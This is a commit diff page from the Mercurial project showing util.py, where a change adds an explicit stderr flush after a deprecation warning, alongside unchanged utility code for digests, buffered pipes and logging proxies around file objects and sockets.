##// END OF EJS Templates
util: flush stderr explicitly after using warnings.warn()...
Pulkit Goyal -
r45513:f46a333f default draft
parent child Browse files
Show More
@@ -1,3596 +1,3598 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import attr
38 38 from .pycompat import (
39 39 delattr,
40 40 getattr,
41 41 open,
42 42 setattr,
43 43 )
44 44 from hgdemandimport import tracing
45 45 from . import (
46 46 encoding,
47 47 error,
48 48 i18n,
49 49 node as nodemod,
50 50 policy,
51 51 pycompat,
52 52 urllibcompat,
53 53 )
54 54 from .utils import (
55 55 compression,
56 56 hashutil,
57 57 procutil,
58 58 stringutil,
59 59 )
60 60
61 61 base85 = policy.importmod('base85')
62 62 osutil = policy.importmod('osutil')
63 63
64 64 b85decode = base85.b85decode
65 65 b85encode = base85.b85encode
66 66
67 67 cookielib = pycompat.cookielib
68 68 httplib = pycompat.httplib
69 69 pickle = pycompat.pickle
70 70 safehasattr = pycompat.safehasattr
71 71 socketserver = pycompat.socketserver
72 72 bytesio = pycompat.bytesio
73 73 # TODO deprecate stringio name, as it is a lie on Python 3.
74 74 stringio = bytesio
75 75 xmlrpclib = pycompat.xmlrpclib
76 76
77 77 httpserver = urllibcompat.httpserver
78 78 urlerr = urllibcompat.urlerr
79 79 urlreq = urllibcompat.urlreq
80 80
81 81 # workaround for win32mbcs
82 82 _filenamebytestr = pycompat.bytestr
83 83
84 84 if pycompat.iswindows:
85 85 from . import windows as platform
86 86 else:
87 87 from . import posix as platform
88 88
89 89 _ = i18n._
90 90
91 91 bindunixsocket = platform.bindunixsocket
92 92 cachestat = platform.cachestat
93 93 checkexec = platform.checkexec
94 94 checklink = platform.checklink
95 95 copymode = platform.copymode
96 96 expandglobs = platform.expandglobs
97 97 getfsmountpoint = platform.getfsmountpoint
98 98 getfstype = platform.getfstype
99 99 groupmembers = platform.groupmembers
100 100 groupname = platform.groupname
101 101 isexec = platform.isexec
102 102 isowner = platform.isowner
103 103 listdir = osutil.listdir
104 104 localpath = platform.localpath
105 105 lookupreg = platform.lookupreg
106 106 makedir = platform.makedir
107 107 nlinks = platform.nlinks
108 108 normpath = platform.normpath
109 109 normcase = platform.normcase
110 110 normcasespec = platform.normcasespec
111 111 normcasefallback = platform.normcasefallback
112 112 openhardlinks = platform.openhardlinks
113 113 oslink = platform.oslink
114 114 parsepatchoutput = platform.parsepatchoutput
115 115 pconvert = platform.pconvert
116 116 poll = platform.poll
117 117 posixfile = platform.posixfile
118 118 readlink = platform.readlink
119 119 rename = platform.rename
120 120 removedirs = platform.removedirs
121 121 samedevice = platform.samedevice
122 122 samefile = platform.samefile
123 123 samestat = platform.samestat
124 124 setflags = platform.setflags
125 125 split = platform.split
126 126 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
127 127 statisexec = platform.statisexec
128 128 statislink = platform.statislink
129 129 umask = platform.umask
130 130 unlink = platform.unlink
131 131 username = platform.username
132 132
133 133
134 134 def setumask(val):
135 135 ''' updates the umask. used by chg server '''
136 136 if pycompat.iswindows:
137 137 return
138 138 os.umask(val)
139 139 global umask
140 140 platform.umask = umask = val & 0o777
141 141
142 142
143 143 # small compat layer
144 144 compengines = compression.compengines
145 145 SERVERROLE = compression.SERVERROLE
146 146 CLIENTROLE = compression.CLIENTROLE
147 147
148 148 try:
149 149 recvfds = osutil.recvfds
150 150 except AttributeError:
151 151 pass
152 152
153 153 # Python compatibility
154 154
155 155 _notset = object()
156 156
157 157
158 158 def bitsfrom(container):
159 159 bits = 0
160 160 for bit in container:
161 161 bits |= bit
162 162 return bits
163 163
164 164
165 165 # python 2.6 still have deprecation warning enabled by default. We do not want
166 166 # to display anything to standard user so detect if we are running test and
167 167 # only use python deprecation warning in this case.
168 168 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
169 169 if _dowarn:
170 170 # explicitly unfilter our warning for python 2.7
171 171 #
172 172 # The option of setting PYTHONWARNINGS in the test runner was investigated.
173 173 # However, module name set through PYTHONWARNINGS was exactly matched, so
174 174 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
175 175 # makes the whole PYTHONWARNINGS thing useless for our usecase.
176 176 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
177 177 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
178 178 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
179 179 if _dowarn and pycompat.ispy3:
180 180 # silence warning emitted by passing user string to re.sub()
181 181 warnings.filterwarnings(
182 182 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
183 183 )
184 184 warnings.filterwarnings(
185 185 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
186 186 )
187 187 # TODO: reinvent imp.is_frozen()
188 188 warnings.filterwarnings(
189 189 'ignore',
190 190 'the imp module is deprecated',
191 191 DeprecationWarning,
192 192 'mercurial',
193 193 )
194 194
195 195
196 196 def nouideprecwarn(msg, version, stacklevel=1):
197 197 """Issue an python native deprecation warning
198 198
199 199 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
200 200 """
201 201 if _dowarn:
202 202 msg += (
203 203 b"\n(compatibility will be dropped after Mercurial-%s,"
204 204 b" update your code.)"
205 205 ) % version
206 206 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 # on python 3 with chg, we will need to explicitly flush the output
208 sys.stderr.flush()
207 209
208 210
209 211 DIGESTS = {
210 212 b'md5': hashlib.md5,
211 213 b'sha1': hashutil.sha1,
212 214 b'sha512': hashlib.sha512,
213 215 }
214 216 # List of digest types from strongest to weakest
215 217 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
216 218
217 219 for k in DIGESTS_BY_STRENGTH:
218 220 assert k in DIGESTS
219 221
220 222
221 223 class digester(object):
222 224 """helper to compute digests.
223 225
224 226 This helper can be used to compute one or more digests given their name.
225 227
226 228 >>> d = digester([b'md5', b'sha1'])
227 229 >>> d.update(b'foo')
228 230 >>> [k for k in sorted(d)]
229 231 ['md5', 'sha1']
230 232 >>> d[b'md5']
231 233 'acbd18db4cc2f85cedef654fccc4a4d8'
232 234 >>> d[b'sha1']
233 235 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
234 236 >>> digester.preferred([b'md5', b'sha1'])
235 237 'sha1'
236 238 """
237 239
238 240 def __init__(self, digests, s=b''):
239 241 self._hashes = {}
240 242 for k in digests:
241 243 if k not in DIGESTS:
242 244 raise error.Abort(_(b'unknown digest type: %s') % k)
243 245 self._hashes[k] = DIGESTS[k]()
244 246 if s:
245 247 self.update(s)
246 248
247 249 def update(self, data):
248 250 for h in self._hashes.values():
249 251 h.update(data)
250 252
251 253 def __getitem__(self, key):
252 254 if key not in DIGESTS:
253 255 raise error.Abort(_(b'unknown digest type: %s') % k)
254 256 return nodemod.hex(self._hashes[key].digest())
255 257
256 258 def __iter__(self):
257 259 return iter(self._hashes)
258 260
259 261 @staticmethod
260 262 def preferred(supported):
261 263 """returns the strongest digest type in both supported and DIGESTS."""
262 264
263 265 for k in DIGESTS_BY_STRENGTH:
264 266 if k in supported:
265 267 return k
266 268 return None
267 269
268 270
269 271 class digestchecker(object):
270 272 """file handle wrapper that additionally checks content against a given
271 273 size and digests.
272 274
273 275 d = digestchecker(fh, size, {'md5': '...'})
274 276
275 277 When multiple digests are given, all of them are validated.
276 278 """
277 279
278 280 def __init__(self, fh, size, digests):
279 281 self._fh = fh
280 282 self._size = size
281 283 self._got = 0
282 284 self._digests = dict(digests)
283 285 self._digester = digester(self._digests.keys())
284 286
285 287 def read(self, length=-1):
286 288 content = self._fh.read(length)
287 289 self._digester.update(content)
288 290 self._got += len(content)
289 291 return content
290 292
291 293 def validate(self):
292 294 if self._size != self._got:
293 295 raise error.Abort(
294 296 _(b'size mismatch: expected %d, got %d')
295 297 % (self._size, self._got)
296 298 )
297 299 for k, v in self._digests.items():
298 300 if v != self._digester[k]:
299 301 # i18n: first parameter is a digest name
300 302 raise error.Abort(
301 303 _(b'%s mismatch: expected %s, got %s')
302 304 % (k, v, self._digester[k])
303 305 )
304 306
305 307
306 308 try:
307 309 buffer = buffer
308 310 except NameError:
309 311
310 312 def buffer(sliceable, offset=0, length=None):
311 313 if length is not None:
312 314 return memoryview(sliceable)[offset : offset + length]
313 315 return memoryview(sliceable)[offset:]
314 316
315 317
316 318 _chunksize = 4096
317 319
318 320
319 321 class bufferedinputpipe(object):
320 322 """a manually buffered input pipe
321 323
322 324 Python will not let us use buffered IO and lazy reading with 'polling' at
323 325 the same time. We cannot probe the buffer state and select will not detect
324 326 that data are ready to read if they are already buffered.
325 327
326 328 This class let us work around that by implementing its own buffering
327 329 (allowing efficient readline) while offering a way to know if the buffer is
328 330 empty from the output (allowing collaboration of the buffer with polling).
329 331
330 332 This class lives in the 'util' module because it makes use of the 'os'
331 333 module from the python stdlib.
332 334 """
333 335
334 336 def __new__(cls, fh):
335 337 # If we receive a fileobjectproxy, we need to use a variation of this
336 338 # class that notifies observers about activity.
337 339 if isinstance(fh, fileobjectproxy):
338 340 cls = observedbufferedinputpipe
339 341
340 342 return super(bufferedinputpipe, cls).__new__(cls)
341 343
342 344 def __init__(self, input):
343 345 self._input = input
344 346 self._buffer = []
345 347 self._eof = False
346 348 self._lenbuf = 0
347 349
348 350 @property
349 351 def hasbuffer(self):
350 352 """True is any data is currently buffered
351 353
352 354 This will be used externally a pre-step for polling IO. If there is
353 355 already data then no polling should be set in place."""
354 356 return bool(self._buffer)
355 357
356 358 @property
357 359 def closed(self):
358 360 return self._input.closed
359 361
360 362 def fileno(self):
361 363 return self._input.fileno()
362 364
363 365 def close(self):
364 366 return self._input.close()
365 367
366 368 def read(self, size):
367 369 while (not self._eof) and (self._lenbuf < size):
368 370 self._fillbuffer()
369 371 return self._frombuffer(size)
370 372
371 373 def unbufferedread(self, size):
372 374 if not self._eof and self._lenbuf == 0:
373 375 self._fillbuffer(max(size, _chunksize))
374 376 return self._frombuffer(min(self._lenbuf, size))
375 377
376 378 def readline(self, *args, **kwargs):
377 379 if len(self._buffer) > 1:
378 380 # this should not happen because both read and readline end with a
379 381 # _frombuffer call that collapse it.
380 382 self._buffer = [b''.join(self._buffer)]
381 383 self._lenbuf = len(self._buffer[0])
382 384 lfi = -1
383 385 if self._buffer:
384 386 lfi = self._buffer[-1].find(b'\n')
385 387 while (not self._eof) and lfi < 0:
386 388 self._fillbuffer()
387 389 if self._buffer:
388 390 lfi = self._buffer[-1].find(b'\n')
389 391 size = lfi + 1
390 392 if lfi < 0: # end of file
391 393 size = self._lenbuf
392 394 elif len(self._buffer) > 1:
393 395 # we need to take previous chunks into account
394 396 size += self._lenbuf - len(self._buffer[-1])
395 397 return self._frombuffer(size)
396 398
397 399 def _frombuffer(self, size):
398 400 """return at most 'size' data from the buffer
399 401
400 402 The data are removed from the buffer."""
401 403 if size == 0 or not self._buffer:
402 404 return b''
403 405 buf = self._buffer[0]
404 406 if len(self._buffer) > 1:
405 407 buf = b''.join(self._buffer)
406 408
407 409 data = buf[:size]
408 410 buf = buf[len(data) :]
409 411 if buf:
410 412 self._buffer = [buf]
411 413 self._lenbuf = len(buf)
412 414 else:
413 415 self._buffer = []
414 416 self._lenbuf = 0
415 417 return data
416 418
417 419 def _fillbuffer(self, size=_chunksize):
418 420 """read data to the buffer"""
419 421 data = os.read(self._input.fileno(), size)
420 422 if not data:
421 423 self._eof = True
422 424 else:
423 425 self._lenbuf += len(data)
424 426 self._buffer.append(data)
425 427
426 428 return data
427 429
428 430
429 431 def mmapread(fp, size=None):
430 432 if size == 0:
431 433 # size of 0 to mmap.mmap() means "all data"
432 434 # rather than "zero bytes", so special case that.
433 435 return b''
434 436 elif size is None:
435 437 size = 0
436 438 try:
437 439 fd = getattr(fp, 'fileno', lambda: fp)()
438 440 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
439 441 except ValueError:
440 442 # Empty files cannot be mmapped, but mmapread should still work. Check
441 443 # if the file is empty, and if so, return an empty buffer.
442 444 if os.fstat(fd).st_size == 0:
443 445 return b''
444 446 raise
445 447
446 448
447 449 class fileobjectproxy(object):
448 450 """A proxy around file objects that tells a watcher when events occur.
449 451
450 452 This type is intended to only be used for testing purposes. Think hard
451 453 before using it in important code.
452 454 """
453 455
454 456 __slots__ = (
455 457 '_orig',
456 458 '_observer',
457 459 )
458 460
459 461 def __init__(self, fh, observer):
460 462 object.__setattr__(self, '_orig', fh)
461 463 object.__setattr__(self, '_observer', observer)
462 464
463 465 def __getattribute__(self, name):
464 466 ours = {
465 467 '_observer',
466 468 # IOBase
467 469 'close',
468 470 # closed if a property
469 471 'fileno',
470 472 'flush',
471 473 'isatty',
472 474 'readable',
473 475 'readline',
474 476 'readlines',
475 477 'seek',
476 478 'seekable',
477 479 'tell',
478 480 'truncate',
479 481 'writable',
480 482 'writelines',
481 483 # RawIOBase
482 484 'read',
483 485 'readall',
484 486 'readinto',
485 487 'write',
486 488 # BufferedIOBase
487 489 # raw is a property
488 490 'detach',
489 491 # read defined above
490 492 'read1',
491 493 # readinto defined above
492 494 # write defined above
493 495 }
494 496
495 497 # We only observe some methods.
496 498 if name in ours:
497 499 return object.__getattribute__(self, name)
498 500
499 501 return getattr(object.__getattribute__(self, '_orig'), name)
500 502
501 503 def __nonzero__(self):
502 504 return bool(object.__getattribute__(self, '_orig'))
503 505
504 506 __bool__ = __nonzero__
505 507
506 508 def __delattr__(self, name):
507 509 return delattr(object.__getattribute__(self, '_orig'), name)
508 510
509 511 def __setattr__(self, name, value):
510 512 return setattr(object.__getattribute__(self, '_orig'), name, value)
511 513
512 514 def __iter__(self):
513 515 return object.__getattribute__(self, '_orig').__iter__()
514 516
515 517 def _observedcall(self, name, *args, **kwargs):
516 518 # Call the original object.
517 519 orig = object.__getattribute__(self, '_orig')
518 520 res = getattr(orig, name)(*args, **kwargs)
519 521
520 522 # Call a method on the observer of the same name with arguments
521 523 # so it can react, log, etc.
522 524 observer = object.__getattribute__(self, '_observer')
523 525 fn = getattr(observer, name, None)
524 526 if fn:
525 527 fn(res, *args, **kwargs)
526 528
527 529 return res
528 530
529 531 def close(self, *args, **kwargs):
530 532 return object.__getattribute__(self, '_observedcall')(
531 533 'close', *args, **kwargs
532 534 )
533 535
534 536 def fileno(self, *args, **kwargs):
535 537 return object.__getattribute__(self, '_observedcall')(
536 538 'fileno', *args, **kwargs
537 539 )
538 540
539 541 def flush(self, *args, **kwargs):
540 542 return object.__getattribute__(self, '_observedcall')(
541 543 'flush', *args, **kwargs
542 544 )
543 545
544 546 def isatty(self, *args, **kwargs):
545 547 return object.__getattribute__(self, '_observedcall')(
546 548 'isatty', *args, **kwargs
547 549 )
548 550
549 551 def readable(self, *args, **kwargs):
550 552 return object.__getattribute__(self, '_observedcall')(
551 553 'readable', *args, **kwargs
552 554 )
553 555
554 556 def readline(self, *args, **kwargs):
555 557 return object.__getattribute__(self, '_observedcall')(
556 558 'readline', *args, **kwargs
557 559 )
558 560
559 561 def readlines(self, *args, **kwargs):
560 562 return object.__getattribute__(self, '_observedcall')(
561 563 'readlines', *args, **kwargs
562 564 )
563 565
564 566 def seek(self, *args, **kwargs):
565 567 return object.__getattribute__(self, '_observedcall')(
566 568 'seek', *args, **kwargs
567 569 )
568 570
569 571 def seekable(self, *args, **kwargs):
570 572 return object.__getattribute__(self, '_observedcall')(
571 573 'seekable', *args, **kwargs
572 574 )
573 575
574 576 def tell(self, *args, **kwargs):
575 577 return object.__getattribute__(self, '_observedcall')(
576 578 'tell', *args, **kwargs
577 579 )
578 580
579 581 def truncate(self, *args, **kwargs):
580 582 return object.__getattribute__(self, '_observedcall')(
581 583 'truncate', *args, **kwargs
582 584 )
583 585
584 586 def writable(self, *args, **kwargs):
585 587 return object.__getattribute__(self, '_observedcall')(
586 588 'writable', *args, **kwargs
587 589 )
588 590
589 591 def writelines(self, *args, **kwargs):
590 592 return object.__getattribute__(self, '_observedcall')(
591 593 'writelines', *args, **kwargs
592 594 )
593 595
594 596 def read(self, *args, **kwargs):
595 597 return object.__getattribute__(self, '_observedcall')(
596 598 'read', *args, **kwargs
597 599 )
598 600
599 601 def readall(self, *args, **kwargs):
600 602 return object.__getattribute__(self, '_observedcall')(
601 603 'readall', *args, **kwargs
602 604 )
603 605
604 606 def readinto(self, *args, **kwargs):
605 607 return object.__getattribute__(self, '_observedcall')(
606 608 'readinto', *args, **kwargs
607 609 )
608 610
609 611 def write(self, *args, **kwargs):
610 612 return object.__getattribute__(self, '_observedcall')(
611 613 'write', *args, **kwargs
612 614 )
613 615
614 616 def detach(self, *args, **kwargs):
615 617 return object.__getattribute__(self, '_observedcall')(
616 618 'detach', *args, **kwargs
617 619 )
618 620
619 621 def read1(self, *args, **kwargs):
620 622 return object.__getattribute__(self, '_observedcall')(
621 623 'read1', *args, **kwargs
622 624 )
623 625
624 626
625 627 class observedbufferedinputpipe(bufferedinputpipe):
626 628 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
627 629
628 630 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
629 631 bypass ``fileobjectproxy``. Because of this, we need to make
630 632 ``bufferedinputpipe`` aware of these operations.
631 633
632 634 This variation of ``bufferedinputpipe`` can notify observers about
633 635 ``os.read()`` events. It also re-publishes other events, such as
634 636 ``read()`` and ``readline()``.
635 637 """
636 638
637 639 def _fillbuffer(self):
638 640 res = super(observedbufferedinputpipe, self)._fillbuffer()
639 641
640 642 fn = getattr(self._input._observer, 'osread', None)
641 643 if fn:
642 644 fn(res, _chunksize)
643 645
644 646 return res
645 647
646 648 # We use different observer methods because the operation isn't
647 649 # performed on the actual file object but on us.
648 650 def read(self, size):
649 651 res = super(observedbufferedinputpipe, self).read(size)
650 652
651 653 fn = getattr(self._input._observer, 'bufferedread', None)
652 654 if fn:
653 655 fn(res, size)
654 656
655 657 return res
656 658
657 659 def readline(self, *args, **kwargs):
658 660 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
659 661
660 662 fn = getattr(self._input._observer, 'bufferedreadline', None)
661 663 if fn:
662 664 fn(res)
663 665
664 666 return res
665 667
666 668
667 669 PROXIED_SOCKET_METHODS = {
668 670 'makefile',
669 671 'recv',
670 672 'recvfrom',
671 673 'recvfrom_into',
672 674 'recv_into',
673 675 'send',
674 676 'sendall',
675 677 'sendto',
676 678 'setblocking',
677 679 'settimeout',
678 680 'gettimeout',
679 681 'setsockopt',
680 682 }
681 683
682 684
683 685 class socketproxy(object):
684 686 """A proxy around a socket that tells a watcher when events occur.
685 687
686 688 This is like ``fileobjectproxy`` except for sockets.
687 689
688 690 This type is intended to only be used for testing purposes. Think hard
689 691 before using it in important code.
690 692 """
691 693
692 694 __slots__ = (
693 695 '_orig',
694 696 '_observer',
695 697 )
696 698
697 699 def __init__(self, sock, observer):
698 700 object.__setattr__(self, '_orig', sock)
699 701 object.__setattr__(self, '_observer', observer)
700 702
701 703 def __getattribute__(self, name):
702 704 if name in PROXIED_SOCKET_METHODS:
703 705 return object.__getattribute__(self, name)
704 706
705 707 return getattr(object.__getattribute__(self, '_orig'), name)
706 708
707 709 def __delattr__(self, name):
708 710 return delattr(object.__getattribute__(self, '_orig'), name)
709 711
710 712 def __setattr__(self, name, value):
711 713 return setattr(object.__getattribute__(self, '_orig'), name, value)
712 714
713 715 def __nonzero__(self):
714 716 return bool(object.__getattribute__(self, '_orig'))
715 717
716 718 __bool__ = __nonzero__
717 719
718 720 def _observedcall(self, name, *args, **kwargs):
719 721 # Call the original object.
720 722 orig = object.__getattribute__(self, '_orig')
721 723 res = getattr(orig, name)(*args, **kwargs)
722 724
723 725 # Call a method on the observer of the same name with arguments
724 726 # so it can react, log, etc.
725 727 observer = object.__getattribute__(self, '_observer')
726 728 fn = getattr(observer, name, None)
727 729 if fn:
728 730 fn(res, *args, **kwargs)
729 731
730 732 return res
731 733
732 734 def makefile(self, *args, **kwargs):
733 735 res = object.__getattribute__(self, '_observedcall')(
734 736 'makefile', *args, **kwargs
735 737 )
736 738
737 739 # The file object may be used for I/O. So we turn it into a
738 740 # proxy using our observer.
739 741 observer = object.__getattribute__(self, '_observer')
740 742 return makeloggingfileobject(
741 743 observer.fh,
742 744 res,
743 745 observer.name,
744 746 reads=observer.reads,
745 747 writes=observer.writes,
746 748 logdata=observer.logdata,
747 749 logdataapis=observer.logdataapis,
748 750 )
749 751
750 752 def recv(self, *args, **kwargs):
751 753 return object.__getattribute__(self, '_observedcall')(
752 754 'recv', *args, **kwargs
753 755 )
754 756
755 757 def recvfrom(self, *args, **kwargs):
756 758 return object.__getattribute__(self, '_observedcall')(
757 759 'recvfrom', *args, **kwargs
758 760 )
759 761
760 762 def recvfrom_into(self, *args, **kwargs):
761 763 return object.__getattribute__(self, '_observedcall')(
762 764 'recvfrom_into', *args, **kwargs
763 765 )
764 766
765 767 def recv_into(self, *args, **kwargs):
766 768 return object.__getattribute__(self, '_observedcall')(
767 769 'recv_info', *args, **kwargs
768 770 )
769 771
770 772 def send(self, *args, **kwargs):
771 773 return object.__getattribute__(self, '_observedcall')(
772 774 'send', *args, **kwargs
773 775 )
774 776
775 777 def sendall(self, *args, **kwargs):
776 778 return object.__getattribute__(self, '_observedcall')(
777 779 'sendall', *args, **kwargs
778 780 )
779 781
780 782 def sendto(self, *args, **kwargs):
781 783 return object.__getattribute__(self, '_observedcall')(
782 784 'sendto', *args, **kwargs
783 785 )
784 786
785 787 def setblocking(self, *args, **kwargs):
786 788 return object.__getattribute__(self, '_observedcall')(
787 789 'setblocking', *args, **kwargs
788 790 )
789 791
790 792 def settimeout(self, *args, **kwargs):
791 793 return object.__getattribute__(self, '_observedcall')(
792 794 'settimeout', *args, **kwargs
793 795 )
794 796
795 797 def gettimeout(self, *args, **kwargs):
796 798 return object.__getattribute__(self, '_observedcall')(
797 799 'gettimeout', *args, **kwargs
798 800 )
799 801
800 802 def setsockopt(self, *args, **kwargs):
801 803 return object.__getattribute__(self, '_observedcall')(
802 804 'setsockopt', *args, **kwargs
803 805 )
804 806
805 807
806 808 class baseproxyobserver(object):
807 809 def __init__(self, fh, name, logdata, logdataapis):
808 810 self.fh = fh
809 811 self.name = name
810 812 self.logdata = logdata
811 813 self.logdataapis = logdataapis
812 814
813 815 def _writedata(self, data):
814 816 if not self.logdata:
815 817 if self.logdataapis:
816 818 self.fh.write(b'\n')
817 819 self.fh.flush()
818 820 return
819 821
820 822 # Simple case writes all data on a single line.
821 823 if b'\n' not in data:
822 824 if self.logdataapis:
823 825 self.fh.write(b': %s\n' % stringutil.escapestr(data))
824 826 else:
825 827 self.fh.write(
826 828 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
827 829 )
828 830 self.fh.flush()
829 831 return
830 832
831 833 # Data with newlines is written to multiple lines.
832 834 if self.logdataapis:
833 835 self.fh.write(b':\n')
834 836
835 837 lines = data.splitlines(True)
836 838 for line in lines:
837 839 self.fh.write(
838 840 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
839 841 )
840 842 self.fh.flush()
841 843
842 844
843 845 class fileobjectobserver(baseproxyobserver):
844 846 """Logs file object activity."""
845 847
846 848 def __init__(
847 849 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
848 850 ):
849 851 super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
850 852 self.reads = reads
851 853 self.writes = writes
852 854
853 855 def read(self, res, size=-1):
854 856 if not self.reads:
855 857 return
856 858 # Python 3 can return None from reads at EOF instead of empty strings.
857 859 if res is None:
858 860 res = b''
859 861
860 862 if size == -1 and res == b'':
861 863 # Suppress pointless read(-1) calls that return
862 864 # nothing. These happen _a lot_ on Python 3, and there
863 865 # doesn't seem to be a better workaround to have matching
864 866 # Python 2 and 3 behavior. :(
865 867 return
866 868
867 869 if self.logdataapis:
868 870 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
869 871
870 872 self._writedata(res)
871 873
872 874 def readline(self, res, limit=-1):
873 875 if not self.reads:
874 876 return
875 877
876 878 if self.logdataapis:
877 879 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
878 880
879 881 self._writedata(res)
880 882
881 883 def readinto(self, res, dest):
882 884 if not self.reads:
883 885 return
884 886
885 887 if self.logdataapis:
886 888 self.fh.write(
887 889 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
888 890 )
889 891
890 892 data = dest[0:res] if res is not None else b''
891 893
892 894 # _writedata() uses "in" operator and is confused by memoryview because
893 895 # characters are ints on Python 3.
894 896 if isinstance(data, memoryview):
895 897 data = data.tobytes()
896 898
897 899 self._writedata(data)
898 900
899 901 def write(self, res, data):
900 902 if not self.writes:
901 903 return
902 904
903 905 # Python 2 returns None from some write() calls. Python 3 (reasonably)
904 906 # returns the integer bytes written.
905 907 if res is None and data:
906 908 res = len(data)
907 909
908 910 if self.logdataapis:
909 911 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
910 912
911 913 self._writedata(data)
912 914
913 915 def flush(self, res):
914 916 if not self.writes:
915 917 return
916 918
917 919 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
918 920
919 921 # For observedbufferedinputpipe.
920 922 def bufferedread(self, res, size):
921 923 if not self.reads:
922 924 return
923 925
924 926 if self.logdataapis:
925 927 self.fh.write(
926 928 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
927 929 )
928 930
929 931 self._writedata(res)
930 932
931 933 def bufferedreadline(self, res):
932 934 if not self.reads:
933 935 return
934 936
935 937 if self.logdataapis:
936 938 self.fh.write(
937 939 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
938 940 )
939 941
940 942 self._writedata(res)
941 943
942 944
943 945 def makeloggingfileobject(
944 946 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
945 947 ):
946 948 """Turn a file object into a logging file object."""
947 949
948 950 observer = fileobjectobserver(
949 951 logh,
950 952 name,
951 953 reads=reads,
952 954 writes=writes,
953 955 logdata=logdata,
954 956 logdataapis=logdataapis,
955 957 )
956 958 return fileobjectproxy(fh, observer)
957 959
958 960
959 961 class socketobserver(baseproxyobserver):
960 962 """Logs socket activity."""
961 963
962 964 def __init__(
963 965 self,
964 966 fh,
965 967 name,
966 968 reads=True,
967 969 writes=True,
968 970 states=True,
969 971 logdata=False,
970 972 logdataapis=True,
971 973 ):
972 974 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
973 975 self.reads = reads
974 976 self.writes = writes
975 977 self.states = states
976 978
977 979 def makefile(self, res, mode=None, bufsize=None):
978 980 if not self.states:
979 981 return
980 982
981 983 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
982 984
983 985 def recv(self, res, size, flags=0):
984 986 if not self.reads:
985 987 return
986 988
987 989 if self.logdataapis:
988 990 self.fh.write(
989 991 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
990 992 )
991 993 self._writedata(res)
992 994
993 995 def recvfrom(self, res, size, flags=0):
994 996 if not self.reads:
995 997 return
996 998
997 999 if self.logdataapis:
998 1000 self.fh.write(
999 1001 b'%s> recvfrom(%d, %d) -> %d'
1000 1002 % (self.name, size, flags, len(res[0]))
1001 1003 )
1002 1004
1003 1005 self._writedata(res[0])
1004 1006
1005 1007 def recvfrom_into(self, res, buf, size, flags=0):
1006 1008 if not self.reads:
1007 1009 return
1008 1010
1009 1011 if self.logdataapis:
1010 1012 self.fh.write(
1011 1013 b'%s> recvfrom_into(%d, %d) -> %d'
1012 1014 % (self.name, size, flags, res[0])
1013 1015 )
1014 1016
1015 1017 self._writedata(buf[0 : res[0]])
1016 1018
1017 1019 def recv_into(self, res, buf, size=0, flags=0):
1018 1020 if not self.reads:
1019 1021 return
1020 1022
1021 1023 if self.logdataapis:
1022 1024 self.fh.write(
1023 1025 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1024 1026 )
1025 1027
1026 1028 self._writedata(buf[0:res])
1027 1029
1028 1030 def send(self, res, data, flags=0):
1029 1031 if not self.writes:
1030 1032 return
1031 1033
1032 1034 self.fh.write(
1033 1035 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1034 1036 )
1035 1037 self._writedata(data)
1036 1038
1037 1039 def sendall(self, res, data, flags=0):
1038 1040 if not self.writes:
1039 1041 return
1040 1042
1041 1043 if self.logdataapis:
1042 1044 # Returns None on success. So don't bother reporting return value.
1043 1045 self.fh.write(
1044 1046 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1045 1047 )
1046 1048
1047 1049 self._writedata(data)
1048 1050
1049 1051 def sendto(self, res, data, flagsoraddress, address=None):
1050 1052 if not self.writes:
1051 1053 return
1052 1054
1053 1055 if address:
1054 1056 flags = flagsoraddress
1055 1057 else:
1056 1058 flags = 0
1057 1059
1058 1060 if self.logdataapis:
1059 1061 self.fh.write(
1060 1062 b'%s> sendto(%d, %d, %r) -> %d'
